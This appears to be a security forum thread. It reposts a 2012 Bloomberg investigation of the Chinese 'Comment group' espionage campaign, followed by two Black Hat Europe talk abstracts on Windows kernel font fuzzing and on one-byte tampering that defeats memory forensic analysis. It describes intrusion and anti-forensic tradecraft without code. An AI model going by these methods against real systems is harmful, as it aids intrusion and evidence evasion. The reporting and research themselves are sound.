    [h=1]Hackers Linked to China’s Army Seen From EU to D.C.[/h]By Michael Riley and Dune Lawrence - Jul 27, 2012 2:00 AM GMT+0300 The hackers clocked in at precisely 9:23 a.m. Brussels time on July 18 last year, and set to their task. In just 14 minutes of quick keyboard work, they scooped up the e-mails of the president of the European Union Council, Herman Van Rompuy, Europe’s point man for shepherding the delicate politics of the bailout for Greece, according to a computer record of the hackers’ activity. Over 10 days last July, the hackers returned to the council’s computers four times, accessing the internal communications of 11 of the EU’s economic, security and foreign affairs officials. The breach, unreported until now, potentially gave the intruders an unvarnished view of the financial crisis gripping Europe. And the spies were themselves being watched. Working together in secret, some 30 North American private security researchers were tracking one of the biggest and busiest hacking groups in China. Observed for years by U.S. intelligence, which dubbed it Byzantine Candor, the team of hackers also is known in security circles as the Comment group for its trademark of infiltrating computers using hidden webpage computer code known as “comments.” During almost two months of monitoring last year, the researchers say they were struck by the sheer scale of the hackers’ work as data bled from one victim after the next: from oilfield services leader Halliburton Co. (HAL) to Washington law firm Wiley Rein LLP; from a Canadian magistrate involved in a sensitive China extradition case to Kolkata-based tobacco and technology conglomerate ITC Ltd. (ITC) [h=2]Gathering Secrets[/h]The researchers identified 20 victims in all -- many of them organizations with secrets that could give China an edge as it strives to become the world’s largest economy. The targets included lawyers pursuing trade claims against the country’s exporters and an energy company preparing to drill in waters China claims as its own. “What the general public hears about -- stolen credit card numbers, somebody hacked LinkedIn (LNKD) -- that’s the tip of the iceberg, the unclassified stuff,” said Shawn Henry, former executive assistant director of the FBI in charge of the agency’s cyber division until leaving earlier this year. “I’ve been circling the iceberg in a submarine. This is the biggest vacuuming up of U.S. proprietary data that we’ve ever seen. It’s a machine.” Exploiting a hole in the hackers’ security, the researchers created a digital diary, logging the intruders’ every move as they crept into networks, shut off anti-virus systems, camouflaged themselves as system administrators and covered their tracks, making them almost immune to detection by their victims. [h=2]Every Move[/h]The minute-by-minute accounts spin a never-before told story of the workaday routines and relentless onslaught of a group so successful that a cyber unit within the Air Force’s Office of Special Investigations in San Antonio is dedicated to tracking it, according to a person familiar with the unit. Those logs -- a record of the hackers’ commands to their victims’ computers -- also reveal the highly organized effort behind a group that more than any other is believed to be at the spear point of the vast hacking industry in China. Byzantine Candor is linked to China’s military, the People’s Liberation Army, according to a 2008 diplomatic cable released by WikiLeaks. Two former intelligence officials verified the substance of the document. [h=2]Hackers and Spies[/h]The methods behind China-based looting of technology and data -- and most of the victims -- have remained for more than a decade in the murky world of hackers and spies, fully known in the U.S. only to a small community of investigators with classified clearances. “Until we can have this conversation in a transparent way, we are going to be hard pressed to solve the problem,” said Amit Yoran, former National Cyber Security Division director at the Department of Homeland Security. Yoran now works for RSA Security Inc., a Bedford, Massachusetts-based security company which was hacked by Chinese teams last year. “I’m just not sure America is ready for that,” he said. What started as assaults on military and defense contractors has widened into a rash of attacks from which no corporate entity is safe, say U.S. intelligence officials, who are raising the alarm in increasingly dire terms. In an essay in the Wall Street Journal July 19, President Barack Obama warned that “the cyber threat to our nation is one of the most serious economic and national security challenges we face.” Ten days earlier, in a speech given in Washington, National Security Agency director Keith Alexander said cyber espionage constitutes “the greatest transfer of wealth in history,” and cited a figure of $1 trillion spent globally every year by companies trying to protect themselves. [h=2]Harvesting Secrets[/h]The networks of major oil companies have been harvested for seismic maps charting oil reserves; patent law firms for their clients’ trade secrets; and investment banks for market analysis that might impact the global ventures of state-owned companies, according to computer security experts who asked not to be named and declined to give more details. China’s foreign ministry in Beijing has previously dismissed allegations of state-sponsored cyberspying as baseless and said the government would crack down if incidents came to light. Contacted for this story, it did so again, referring to earlier ministry statements. Private researchers have identified 10 to 20 Chinese hacking groups but said they vary significantly in activity and size, according to government investigators and security firms. [h=2]Group Apart[/h]What sets the Comment group apart is the frenetic pace of its operations. The attacks documented last summer represent a fragment of the Comment group’s conquests, which stretch back at least to 2002, according to incident reports and interviews with investigators. Milpitas, California-based FireEye Inc. alone has tracked hundreds of victims in the last three years and estimates the group has hacked more than 1,000 organizations, said Alex Lanstein, a senior security researcher. Stolen information is flowing out of the networks of law firms, investment banks, oil companies, drug makers, and high technology manufacturers in such significant quantities that intelligence officials now say it could cause long-term harm to U.S. and European economies. [h=2]’Earthquake Is Coming’[/h]“The activity we’re seeing now is the tremor, but the earthquake is coming,” said Ray Mislock, who before retiring in September was chief security officer for DuPont Co., which has been hacked by unidentified Chinese teams at least twice since 2009. “A successful company can’t sustain a long-term loss of knowledge that creates economic power,” he said. Even those offline aren’t safe. Y.C. Deveshwar, 65, a businessman who heads ITC, India’s largest maker of cigarettes, doesn’t use a computer. The Comment hackers last year still managed to steal a trove of his documents, navigating the conglomerate’s huge network to pinpoint the machine used by Deveshwar’s personal assistant. On July 5, 2011, the thieves accessed a list of documents that included Deveshwar’s family addresses, tax filings, and meeting minutes, as well as letters to fellow executives, such as London-based British American Tobacco Plc (BATS) chairman Richard Burrows and BAT chief executive, Nicandro Durante, according to the logs. They tried to open one entitled “YCD LETTERS” but couldn’t, so the hackers set up a program to steal a password the next time his assistant signed on. [h=2]Keeping Quiet[/h]When Bloomberg contacted the company in May, spokesman Nazeeb Arif said ITC was unaware of the breach, potentially giving the hackers unimpeded access to ITC’s network for more than a year. Deveshwar said in a statement that “no classified company related documents” were kept on the computer. Companies that discover their networks have been commandeered usually keep quiet, leaving the public, shareholders and clients unaware of the magnitude of the problem. Of the 10 Comment group victims reached by Bloomberg, those who learned of the hacks chose not to disclose them publicly, and three said they were unaware they’d been hacked until contacted for this story. This account of the Comment group is based on the researchers’ logs, as well as interviews with current and former intelligence officials, victims, and more than a dozen U.S. cybersecurity experts, many of whom track the group independently. [h=2]Private Investigators[/h]The researcher who provided the computer logs asked not to be named because of the sensitivity of the data, which included the name of victims. He was part of a collaborative drawn from 20 organizations that included people from private security companies, a university, internet service providers and companies that have been targeted, including a defense contractor and a pharmaceutical firm. The group included some of the top experts in the field, with experience investigating cyberspying against the U.S. government, major corporations and high profile political targets, including the Dalai Lama. Like similar, ad hoc teams formed temporarily to study hackers’ techniques, the group worked in secret because of the sensitivities of the investigation aimed at state-sponsored espionage. A smaller version of the group is continuing its research. As the surge in attacks on businesses and non-government groups over the last five years has pulled private security experts into the hacker hunt, they say they’re gradually catching up with U.S. counterintelligence agencies, which have been tackling the problem for a decade. [h=2]Espionage Tools[/h]One Comment group trademark involves hijacking unassuming public websites to send commands to victim computers, turning mom-and-pop sites into tools of foreign espionage, but also allowing the group to be monitored if those websites can be found, according to security experts. Sites it has commandeered include one for a teacher at a south Texas high school with the website motto “Computers Rock!” and another for a drag racing track outside Boise, Idaho. Adding a potentially important piece to the puzzle, researcher Joe Stewart, who works for Dell SecureWorks, an Atlanta-based security firm and division of Dell Inc. (DELL), the computer technology company, last year uncovered a flaw in software used by Comment group hackers. Designed to disguise the pilfered data’s ultimate destination, the mistake instead revealed that in hundreds of instances, data was sent to Internet Protocol (IP) addresses in Shanghai. Military Link? The location matched intelligence contained in the 2008 State Department cable published by WikiLeaks that placed the group in Shanghai and linked it to China’s military. Commercial researchers have yet to make that connection. The basis for that cable’s conclusion, which includes the U.S.’s own spying, remains classified, according to two former intelligence specialists. Lanstein said that although the make-up of the Comment group has changed over time -- the logs show some inexperienced hackers in the group making repeated mistakes, for example --the characteristics of a single group are unmistakable. The code and tools used by Comment aren’t public, and anyone using it would have to be given entre into the hackers’ ranks, he said. By October 2008, when the diplomatic cable published by WikiLeaks outlined the group’s activities, the Comment group had raided the networks of defense contractors and the Department of State, as well as made a specialty of hacking U.S. Army systems. The classified code names for China’s hacking teams were changed last year after that leak. Cybersecurity experts have connected the group to a series of headline-grabbing hacks, ranging from the 2008 presidential campaigns of Barack Obama and John McCain to the 72 victims documented last year by the Santa Clara, California-based security firm McAfee Inc., in what it called Operation Shady Rat. [h=2]Nuclear Break-In[/h]Others, not publicly attributed to the group before, include a campaign against North American natural gas producers that began in December 2011 and was detailed in an April alert by the Department of Homeland Security, two experts who analyzed the attack said. In another case, the hackers first stole a contact list for subscribers to a nuclear management newsletter, and then sent them forged e-mails laden with spyware. In that instance, the group succeeded in breaking into the computer network of at least one facility, Diablo Canyon nuclear plant, next to the Hosgri fault north of Santa Barbara, according to a person familiar with the case who asked not to be named. Last August, the plant’s incident management team saw an anonymous Internet post that had been making the rounds among cybersecurity professionals. It purported to identify web domains being used by a Chinese hacking group, including one that suggested a possible connection to Diablo plant operator Pacific Gas & Electric Co., according to an internal report obtained by Bloomberg News. [h=2]Partial Control[/h]It’s unclear how the information got to the Internet, but when the plant investigated, it found that the computer of a senior nuclear planner was at least partly under the control of the hackers, according to the report. The internal probe warned that the hackers were attempting “to identify the operations, organizations, and security of U.S. nuclear power generation facilities.” The investigators concluded that they had caught the breach early and there was “no solid indication” data was stolen, according to the report, though they also found evidence of several previous infections. Blair Jones, a spokesman for PG&E, declined to comment, citing plant security. Around the time the hackers were sending malware-laden e- mails to U.S. nuclear facilities, six people at the Wiley Rein law firm were ushered into hastily called meetings. In the room were an ethics compliance officer and a person from the firm’s information technology team, according to a person familiar with the investigation. The firm had been hacked, each of the six were told, and they were the targets. [h=2]Lawyers’ Files[/h]Among them were Alan Price and Timothy Brightbill. Firm partners and among the best known international trade lawyers in the country, they’ve handled a series of major anti-dumping and unfair trade cases against China. One of those, against China’s solar cell manufacturers, in May resulted in tariffs on more than $3 billion in Chinese exports, making it one of the largest anti-dumping cases in U.S. history. Dale Hausman, Wiley Rein’s general counsel, said he couldn’t comment on how the breach affected the firm or its clients. Wiley Rein has since strengthened its network security, Hausman said. “Given the nature of that practice, it’s almost a cost of doing business. It’s not a surprise,” he said. [h=2]E-Mails to Spouses[/h]Tipped off by the researchers, the firm called the Federal Bureau of Investigation, which dispatched a team of cyber investigators, the person familiar with the investigation said. Comment hackers had encrypted the data it stole, a trick designed to make it harder to determine what was taken. The FBI managed to decode it. The data included thousands of pages of e-mails and documents, from lawyers’ personal chatter with their spouses to confidential communications with clients. Printed out in a stack, the cache was taller than a set of encyclopedias, the person said. Researchers watching the hackers’ keystrokes last summer say they couldn’t see most of what was stolen, but it was clear that the spies had complete control over the firm’s e-mail system. The logs also hold a clue to how the FBI might have decrypted what was stolen. They show the simple password the hackers used to encrypt the files: 123!@#. Paul Bresson, a spokesman for the FBI in Washington, declined to comment. [h=2]Following the Crisis[/h]In case after case, the hackers’ trail crisscrossed with geopolitical events and global headlines. Last summer, as the news focused on Europe’s financial crisis, with its import for China’s rising economic power, the hackers followed. The timing coincided with an intense period for EU Council President Van Rompuy, set off by the failure July 11 of the EU finance ministers to agree on a second bailout package for Greece. Over the next 10 days, the slight and balding former Belgian prime minister presided over the negotiations, drawing European leaders, including German Chancellor Angela Merkel, to a consensus. Although the monitoring of Van Rompuy and his staff occurred during those talks, researchers say that the logs suggest a broad attack that wasn’t timed to a specific event. It was the cyber equivalent of a wiretap, they say -- an operation aimed at gathering vast amounts of intelligence over weeks, perhaps months. [h=2]’Big Implications’[/h]Richard Falkenrath, former deputy homeland security adviser to President George W. Bush, said China has succeeded in integrating decision-making about foreign economic and investment policy with intelligence collection. “That has big implications for the rest of the world when it deals with the country on those terms,” he said. Beginning July 8, 2011, the hackers’ access already established, they dipped into the council’s networks repeatedly over 10 days. The logs suggest an established routine, with the spies always checking in around 9 a.m. local time. They controlled the council’s exchange server, which gave them complete run of the e-mail system, the logs show. From there, the hackers simply opened the accounts of Van Rompuy and the others. [h=2]Week of E-Mails[/h]Moving from one victim to the next, the spies grabbed e- mails and attached documents, encrypted them in compression files and catalogued the reams of material by date. They grabbed a week’s worth of e-mails each time, appearing to follow a set protocol. Their other targets included then economic adviser and deputy head of cabinet, Odile Renaud-Basso, and the EU’s counter-terrorism coordinator. It’s unclear how long the hackers had been in the council’s network before the researchers’ monitoring began -- or how long it lasted after the end of July last year. There’s no indication the hackers penetrated the council’s offline system for secret documents. “Classified information and other sensitive internal information is handled on separate, dedicated networks,” the council press office said in a statement when asked about the hacks. The networks connected to the Internet, which handle e-mail, “are not designed for handling classified information.” What the EU did about the breach is unclear. Dirk De Backer, a spokesman for Van Rompuy, declined to comment on the incident, as did an official from the EU Council’s press office. A member of the EU’s security team joined the group of researchers in late July, and was provided information that would help identify the hackers’ trail, one of the researchers said. [h=2]“No Knowledge”[/h]Zoltan Martinusz, then principal adviser on external affairs and one of two victims reached by Bloomberg who would address the issue, said, “I have no knowledge of this.” The other official, who wasn’t authorized to discuss internal security and asked not to be identified, said he was informed last year that his e-mails had been accessed. The logs show how the hackers consistently applied the same, simple line of attack, the researchers said. Starting with a malware-laden e-mail, they moved rapidly through networks, grabbing encrypted passwords, cracking the coding offline, and then returning to mimic the organization’s own network administrators. The hackers were able to dip in and out of networks sometimes over months. The approach circumvented the millions of dollars the organizations collectively spent on protection. [h=2]Security Switched Off[/h]As the spies rifled the network of Business Executives for National Security Inc., a Washington-based nonprofit whose advisory council includes former Secretary of State Henry Kissinger and former Treasury Secretary Robert Rubin, the logs show them switching off the system’s Symantec anti-virus software. Henry Hinton Jr., the group’s chief operations officer, said in June he was unaware of the hack, confirming the user names of staff computers that the logs show were accessed, his among them. The records show the hackers’ mistakes, but also clever tricks. Using network administrator status, they consolidated onto a single machine the computer contents of the president and seven other staff members of the International Republican Institute, a nonprofit group promoting democracy. [h=2]220 Documents[/h]With all that data in one place, the hackers on June 29, 2011, selected 220 documents, including PDFs, spreadsheets, photos and the organization’s entire work plan for China. When they were done, the Comment group zipped up the documents into several encrypted files, making the data less noticeable as it left the network, the logs show. Lisa Gates, a spokeswoman for the IRI, confirmed that her organization was hacked but declined to comment on the impact on its programs in China because of concern for the safety of staff and people who work with the group. A funding document describes activities including supporting independent candidates in China, who frequently face harassment by China’s authorities. As a portrait of the hackers at work, the logs also show how nimbly they could respond to events, even when sensitive government networks were involved. The hackers accessed the network of the Immigration and Refugee Board of Canada July 18 last year, targeting the computer of Leeann King, an immigration adjudicator in Vancouver. King had made headlines less than a week earlier when she temporarily freed Chinese national Lai Changxing in the final days of a long extradition fight. Chinese authorities had been chasing Lai since he fled to Canada in 1999, alleging that he ran a smuggling ring that netted billions of dollars. [h=2]Cracking Court Accounts[/h]Monitoring by Cyber Squared Inc., an Arlington, Virginia- based company that tracks Comment independently and that captured some of the same activity as the researchers, recorded the hackers as they worked rapidly to break into King’s account. Beginning only with access to computers in Toronto, the hackers grabbed and decrypted user passwords, gaining access to IRB’s network in Vancouver and ultimately, the logs show, to King’s computer. From start to finish, the work took just under five hours. Melissa Anderson, a spokeswoman for the board, said officials had no comment on the incident other than to say that any such event would be fully investigated. Lai was eventually sent back to China on July 23, 2011 after losing a final appeal. He was arrested, tried, and in May of this year, a Chinese court sentenced him to life in prison. [h=2]Controlling the Networks[/h]In case after case, the hackers had the run of the networks they were rifling. It’s unclear how many of the organizations researchers contacted, but in only one of those cases was the victim already aware of the intrusion, according to one member of the group. Halliburton officials said they were aware of the intrusion and were working with the FBI, one of the researchers said. Marisol Espinosa, a spokeswoman for the publicly traded company, declined to comment on the incident. The trail last summer led to some unlikely spots, including Pietro’s, an Italian restaurant a couple of blocks from Grand Central station in New York. In business since 1932, guests to the dim, old-fashioned dining room can choose linguine with clam sauce (red or white) for $28. The Comment group stopped using the restaurant’s site to communicate with hacked networks sometime last year, said FireEye’s Lanstein, who discovered that the hackers had left footprints there. Traces are still there. [h=2]’Ugly Gorilla’[/h]Hidden in the webpage code of the restaurant’s site is a single command: ugs12, he said. It’s an order to a captive computer on some victim’s network to sleep for 12 minutes, then check back in, he explained. The ”ug” stands for “ugly gorilla,” what security experts believe is a moniker for a particularly brash member of Comment, a signal for anyone looking that the hackers were there, said Lanstein. “We’re so good even hackers want us!” joked Bill Bruckman, the restaurant’s co-owner, when he was told his website had been part of the global infrastructure of a Chinese hacking team. “Hey, put my name out there -- any business is good business,” he said. Bruckman said he knew nothing about the breach. A few friends reported trouble accessing the site about six months ago, though he said he’d never figured out what the problem was. Outside a moment later, smoking a cigarette, Bruckman added a more serious note. “Think of all that effort and information going down the drain. What a waste, you know what I mean?” Sursa: Hackers Linked to China’s Army Seen From EU to D.C. - Bloomberg
  24. Nytro
    Blackhat 2012 Europe - Gdi Font Fuzzing In Windows Kernel For Fun Description: Blackhat 2012 EUROPE - GDI Font Fuzzing in Windows Kernel For Fun https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Slides.pdf https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Tool.zip There are different types of font available within Windows and two groups of categories exist: GDI fonts and Device fonts. This talk will cover the GDI TrueType & GDI Bitmap fonts only on Windows platform. In GDI, one typically to create font is filling in a LOGFONT Structure and then calling CreateFontIndirect which returns a font handle. As expect from the name, a LOGFONT structure is a logical font, if the user draw some text using that font handle, GDI will look for a matching physical font to draw the text. If it doesn't find any match font name, it will use some other font. The resulting outcome is that the font fuzzer is working at the lower level through physical font API's provided by the GDI itself. For instance, API functions GetFontData, GetGlyphIndices and even ExtTextOut when used with the ETO_GLYPH_INDEX flag. Font fuzzer in this talk is aim to trigger the font vulnerabilities published in internet, two vulnerability in Windows Kernel MS11-077 and MS11-087 in handling crafted font will be discussed in this talk. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Blackhat 2012 Europe - Gdi Font Fuzzing In Windows Kernel For Fun
  25. Nytro
    Blackhat 2012 Europe - One-Byte Modification For Breaking Memory Forensic Analysis Description: https://media.blackhat.com/bh-eu-12/Haruyama/bh-eu-12-Haruyama-Memory_Forensic-Slides.pdf Memory forensics is an effective technique to detect malwares quickly or extract sensitive user data from RAM. Memory forensics is separated into two parts: memory acquisition and analysis. So far, some anti-acquisition methods were proposed and demonstrated, but there was no sufficient discussion about anti-analysis ones. This presentation introduces anti-analysis methods based on unconsidered assumptions of the existing analysis tools. By using the methods, attackers can abort memory analysis and make the result empty. Since it's difficult for forensic analysts to figure out the cause from error messages, they must think acquired memory images are simply corrupted. Specifically, anti-analysis methods focus attention on three operations performed in memory analysis. All major analysis tools take several rapid approaches in these operations. If attackers want to make the analysis tools fail with the smallest modification, all they have to do is to modify only one byte of the data structure related to one approach. Of course, the modification has no impact on the running system. The presentation is made up as follows. First, I show an overview about memory acquisition and analysis such as memory image formats, evaluation of acquisition tools, memory analyzing methods, comparison of analysis tools, and so on. Next, I point out issues of each analysis tool and key structures referred to by it, then I demonstrate all analysis tools fail by modifying data in the structures. Finally, I suggest desired usages for forensic analysts and improvement plans for developers to decrease the risk of anti-analysis methods. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Blackhat 2012 Europe - One-Byte Modification For Breaking Memory Forensic Analysis
×
×
  • Create New...